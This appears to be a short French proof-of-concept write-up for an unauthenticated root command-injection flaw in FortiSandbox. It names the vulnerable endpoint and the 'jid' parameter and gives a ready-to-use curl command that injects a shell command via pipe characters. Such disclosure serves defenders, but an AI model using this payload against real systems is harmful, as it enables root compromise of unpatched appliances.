
PoC pour RCE non authentifiée dans FortiSandbox via CVE-2026-39808
En novembre 2025, une vulnérabilité critique a été découverte dans le FortiSandbox de Fortinet, permettant à un attaquant non authentifié d'exécuter des commandes dans le système d'exploitation sous-jacent en tant que root. La vulnérabilité a été corrigée et finalement rendue publique en avril 2026.
Cette vulnérabilité affecte les versions 4.4.0 à 4.4.8 de FortiSandbox.
Consultez l'avis complet ici.
Cette vulnérabilité affecte le point de terminaison /fortisandbox/job-detail/tracer-behavior. Des commandes système peuvent être injectées à l'aide du symbole pipe (|) dans le paramètre GET jid.
Dans l'exemple ci-dessus, la sortie a été redirigée vers un fichier dans la racine web, afin qu'elle puisse être récupérée ensuite.
Une simple commande curl suffit pour obtenir une RCE en tant que root sans authentification préalable :
curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"